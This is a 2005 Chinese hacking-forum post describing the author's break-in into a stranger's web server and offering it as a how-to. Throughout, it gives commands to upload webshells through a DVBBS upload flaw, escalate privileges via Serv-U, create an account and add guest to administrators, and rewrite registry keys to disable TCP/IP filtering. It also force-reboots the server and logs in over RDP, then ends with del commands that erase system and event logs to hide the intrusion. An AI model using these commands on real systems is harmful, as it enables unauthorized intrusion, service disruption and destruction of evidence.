查看: 2365|回复: 1

从建立用户到3389登陆

字体大小: 正常放大

韩冰

823 主题	3 听众	4048 积分

我的地盘我做主

该用户从未签到

电梯直达

1^#

发表于 2005-1-23 13:50 |只看该作者 |倒序浏览

|招呼Ta 关注Ta

作者：晓菲来自：http://www.wrsky.com/

本人技术比较菜，希望各位高手看了后不要笑话。。

今天下午在上网，一个QQ号接到某些人用那个QQ发言软件发来的消息，反正就是广告好了，但是也没太黄，或者太难听，就是宣传自己的主页的，一般碰到这样的情况我都爱理不理，正好看到他和我是一个地方的，我们这小山钩钩还有人会在网上发布消息，真晕哦。不行，得去看一看，我没有直接打开，（我也怕里面有网页木马），好吧，用明小子的Domain，就是那个旁注工具，一般我都喜欢先看一下，扫到一个upfile.asp，是DVBBS，很容易的上传一个马，好了，进入，我使用的是冰点的2005.asp和火狐专用版4.asp，（其实我还是比较喜欢用老兵的木马，但是不知道什么原因不能用了，555，技术菜真汗。~~~）好了，废话不说了，开工。 ; n" O% v$ ~ b/ Y3 ^我主要介绍一下建立管理员的过程，好，先看看能打开别的盘不能， " D/ w4 G. A m; q5 t/ {) m1 D哇，这个服务器很好，可以浏览整个服务器里硬盘里的所有数据，而且还可以写入 ) B! C2 y0 O4 n7 d使用一下net user& _4 D2 H7 {2 \$ C5 C 返回的提示信息显示，只有默认的几个帐户，嘿，* l$ d3 N o, ?; J5 r 在试一下 1 J8 \- Q# @$ Q. l" ?/ |, p1 F/ Rnet user xiaofei xiaofei /add ps:建立一个xiaofei的用户名密码也是xiaofei! A8 r. K Z+ |2 I8 u ASP木马没有显示，哎看来不行，我还没有试过直接可以用ASP木马建立用户名的服务器呢，（其实以前也没有成功过）$ X2 D. P8 q/ h7 l8 G 哎那就在换别的方法) a2 r( p! Y- v$ @, F 好的，看他用PCANYWHERE了吗，一般使用这个作为网站管理的比较多。 / K" ?/ E; ?5 {! b; S/ I找一下他的默认目录：2 R+ K8 y/ r7 \' ^3 k B C:/Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/ 9 u" i2 t- v6 l. K. m哎，这个服务器也没有装，难道没有方法建立用户名了吗？ & B' u. K* @* E% I% y4 e3 l8 E在找找，在D盘里看到了SERU，忘记看版本了，想到可以用工具提权，就糊里糊涂的上传了一个工具上去，找了一个ftp.exe，ok，然后! o+ Y: s2 X0 O& u4 w D:ftp.exe "net user xiaofei xiaofei /add"4 z+ A: e+ i: p' j! o s' G$ A 提示一大堆返回信息什么的，然后使用了一下net user 看到xiaofei这个用户名了，就是成功了。 / q7 Z' n# U9 e( w0 zD:ftp.exe "net user xiaofei xiaofei /add"$ _5 E& H- |; D* \+ W% c 继续提权，在继续输入+ X+ i1 {- s# W C3 A D:ftp.exe "net localgroup administrators guest /add“, ^2 `: b L# e& r' n 又成功，然后执行了一下netstat -an 看了一下，ok，3389已经开放了，不用在麻烦我去开3389了，ok，找3389终端登陆，go。 5 C# C0 P) ^. q打开终端了，但是连不上，晕忽忽。哭哟，用户名都建好了，还连不上主机，在翻了一下目录，也没看到有防火墙，使用ipconfig -all，也没有和内网连接的迹象呀，郁闷ing，不知道怎么办了。正好在冰点极限论坛看到了一篇文章，“从上传webshell到突破TCP/IP筛选到3389终端登陆”（我在下面的回帖中会放上这个帖子，帖子中有详细的介绍）其实这样的文章好多，平时其实没怎么注意的，正好现在被我看到了，哈哈运气好，希望明天买彩票也能中个500W就好了。ok。其实是服务器做了TCP，IP筛选，3389端口可能只能让某一段IP进行访问，那好吧，我们就把他删掉。% ]" \( c, w0 D3 a/ P D:\ftp.exe "regedit -e D:\.1reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip" 导出注册表里关于TCP/IP筛选的第一处( F" w/ m; \1 Z x9 D+ W! N D:\ftp.exe "regedit -e D:\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip" 导出注册表里关于TCP/IP筛选的第i二处( o6 _! W% ~7 g7 G7 F0 K6 J1 o5 F C D:\ftp.exe "regedit -e D:\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip" 导出注册表里关于TCP/IP筛选的第三处1 G# ]! ?' _" _. V; m3 Y$ d7 z 然后下载到自己的PC里，使用记事本编辑，然后ctrl+F搜索EnableSecurityFilters"=dword:00000001这个参数，把它改成EnableSecurityFilters"=dword:00000000。把1.reg，2.reg，3.reg都改过来，然后上传回服务器路径中，我又上传到了D盘里，~好了，我们要把刚才编辑的1，2，3都导入注册表中。" P8 l& [, s$ V' z D:\ftp.exe "regedit -s D:\1.reg" 直接将1.reg导入到注册表中- \( c. i9 ? X, \3 { 另外两个也一样。1 P% J8 z) s4 y* R 然后在执行 + C: x$ z4 ?% ^, U. F# ]. sD:\ftp.exe "iisreset /reboot /timeout:00" 利用他自身的iis 服务来重新启动他的机器，/timeout:00这个参数是让他立即重新启动，也就是一小会，访问网站，已经访问不进去了，差不多几分钟后，可以访问了，直接登陆3389，输入我建立的用户名，ok了。我们的提权访问工作也做完了。最好也把日志清一下，做坏事了嘛，嘿嘿。下面是日志存放文件，在DOS下运行一下就ok了，不在需要用用别的工具咯。 2 H1 _4 K+ u* P U2 V2 ]1 gdel C:\winnt\system32\logfiles\*.* % }9 r0 ~: p6 bdel C:\winnt\ssytem32\config\*.evt 5 | Z. V6 _. K$ C' R2 F del C:\winnt\system32\dtclog\*.* R" L- g, r7 g, U del C:\winnt\system32\*.log n4 x) v m) K5 z3 w0 k del C:\winnt\system32\*.txt ' N! f/ a7 N+ Q+ }* gdel C:\winnt\*.txt $ W4 X: b3 d$ E6 R/ j del C:\winnt\*.log / R0 j3 E& K! H' I9 P# Y0 `6 f5 o# { 当然人家做个服务器也不容易，大家不要对国内的机器进行破坏哦。好了，找服务器的管理员的联系方法去了，如果你要是做违法的事，小心警察叔叔第二天来敲门哦。。。* F; B1 f$ Q ~- V: Y 本人只会使用一些别人编写好的程序进行对网站的攻击，但是对基本的原理还不太了解，来到火狐希望能和大家一起学习一些基础的知识，大家来一起学习吧。1 K9 P/ `% ^+ Q6 d3 D _' Z% a" w 本人在申请火狐论坛的认证会员，希望管理员看在打了这么多字的份上在多考虑一下拉，好好学习，天天向上。